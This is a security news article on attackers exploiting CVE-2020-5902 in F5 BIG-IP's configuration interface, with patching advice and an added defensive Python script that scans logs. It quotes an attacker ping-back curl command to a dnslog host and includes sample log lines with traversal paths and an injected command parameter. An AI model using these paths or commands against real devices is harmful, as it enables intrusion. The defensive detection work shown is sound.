Attackers are breaching F5 BIG-IP devices, check whether you’ve been hit
Attackers are actively trying to exploit CVE-2020-5902, a critical vulnerability affecting F5 Networks’ BIG-IP multi-purpose networking devices, to install coin-miners or IoT malware, or to scrape administrator credentials from the hacked devices.
About CVE-2020-5902
CVE-2020-5902 is a critical remote code execution vulnerability in the configuration interface (aka Traffic Management User Interface – TMUI) of BIG-IP devices used by some of the world’s biggest companies.
Positive Technologies researcher Mikhail Klyuchnikov discovered it together with CVE-2020-5903, a less critical XSS vulnerability that allows malicious JavaScript code to run as the logged-in user on BIG-IP devices.
To exploit CVE-2020-5902, an attacker needs to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.
“By exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution. The attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network,” the researcher noted.
“RCE in this case results from security flaws in multiple components, such as one that allows directory traversal exploitation. This is particularly dangerous for companies whose F5 BIG-IP web interface is listed on search engines such as Shodan. Fortunately, most companies using the product do not enable access to the interface from the internet.”
Shodan shows around 8,500 vulnerable devices available on the internet, nearly 40% of which are in the U.S.
Active exploitation
F5 Networks published security advisories for both flaws last Wednesday, just as the U.S. was looking forward to the long Independence Day weekend.
Both the company and the U.S. Cyber Command urged admins on Friday to check whether their F5 BIG-IP web interfaces were exposed on the internet and to apply the available patches before the weekend started.
At the time, there was no public exploit available for CVE-2020-5902, but several soon appeared. A Metasploit module is also in the works.
Over the weekend, opportunistic mass scanning for vulnerable devices began, and various attackers started leveraging the exploits:
As of this morning we are seeing an uptick in RCE attempts against our honeypots, using a combination of either the public Metasploit module, or similar via Python. Also a large wave of attacks coming from 🇨🇳 which do a ping back via:
curl <vulnip>.<id>.dnslog[.]cn
— Rich Warren (@buffaloverflow) July 6, 2020
What to do?
According to F5 Networks, BIG-IP networking devices are used as server load balancers, application delivery controllers, access gateways, etc. by 48 of the Fortune 50 companies, as well as by ISPs and governments.
As noted before, F5 Networks released fixed software versions last week, along with risk mitigation advice for organizations that cannot patch immediately.
For organizations that didn’t get around to any of it, Microsoft cybersecurity pro Kevin Beaumont offers the following advice:
So people are scraping secrets (credentials) off BIG-IP boxes in an automated fashion. If you didn’t patch before the weekend I think you will need to rotate creds and check logs after patching when you’re back in work.
— Kevin Beaumont (@GossiTheDog) July 5, 2020
SANS ISC handler Didier Stevens has also provided helpful links and advice.
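The "check logs" step in the advice above can be partly automated. The script below is an added example, not code from F5 or any of the researchers quoted here; it assumes the TMUI front end writes Apache combined-format access logs and runs over constructed sample lines. It flags TMUI requests that contain directory traversal after URL decoding (the flaw the page attributes to the RCE), requests carrying the dnslog[.]cn ping-back indicator from the tweet above, and any TMUI access from outside the administrative network ranges you pass in.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote

# Apache combined log format is assumed for the TMUI web server.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: the paths and addresses are illustrative, not real captures.
SAMPLE_LOG = """\
10.0.0.5 - admin [06/Jul/2020:08:01:12 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Jul/2020:08:02:45 +0000] "GET /tmui/login.jsp/%2e%2e/%2e%2e/admin/page.jsp HTTP/1.1" 200 2210 "-" "python-requests/2.23"
203.0.113.7 - - [06/Jul/2020:08:02:46 +0000] "GET /tmui/login.jsp/..%252f..%252fadmin/page.jsp HTTP/1.1" 404 310 "-" "curl/7.68"
198.51.100.9 - - [06/Jul/2020:08:03:10 +0000] "GET /tmui/login.jsp?cmd=curl+x.abc.dnslog.cn HTTP/1.1" 200 120 "-" "curl/7.68"
10.0.0.5 - admin [06/Jul/2020:08:04:00 +0000] "GET /tmui/locallb/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def decode_path(path: str) -> str:
    """URL-decode up to twice so single- and double-encoded traversal both surface."""
    for _ in range(2):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def analyze_tmui_log(text: str, admin_nets=("10.0.0.0/8",)):
    """Return one finding per suspicious TMUI request, oldest first."""
    nets = [ip_network(n) for n in admin_nets]
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = decode_path(m["path"]).lower()
        if not path.startswith("/tmui/"):
            continue  # only the configuration utility is in scope
        reasons = []
        if ".." in path:
            reasons.append("directory traversal in TMUI path")
        if "dnslog" in path:
            reasons.append("dnslog ping-back indicator")
        if not any(ip_address(m["ip"]) in n for n in nets):
            reasons.append("TMUI reached from outside admin range")
        if reasons:
            status = int(m["status"])
            findings.append({"ip": m["ip"], "time": m["ts"], "status": status,
                             "likely_success": status == 200 and ".." in path,
                             "reasons": reasons})
    return findings
```

A traversal request answered with HTTP 200 is the strongest signal that the device should be treated as compromised and its credentials rotated, not merely patched.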
UPDATE (July 8, 2020, 3:42 a.m. PT):
Attackers are bypassing one of the mitigations originally provided by F5 Networks, so any organization that applied it instead of patching their F5 BIG-IP boxes should take action again and check whether their devices have been compromised in the meantime.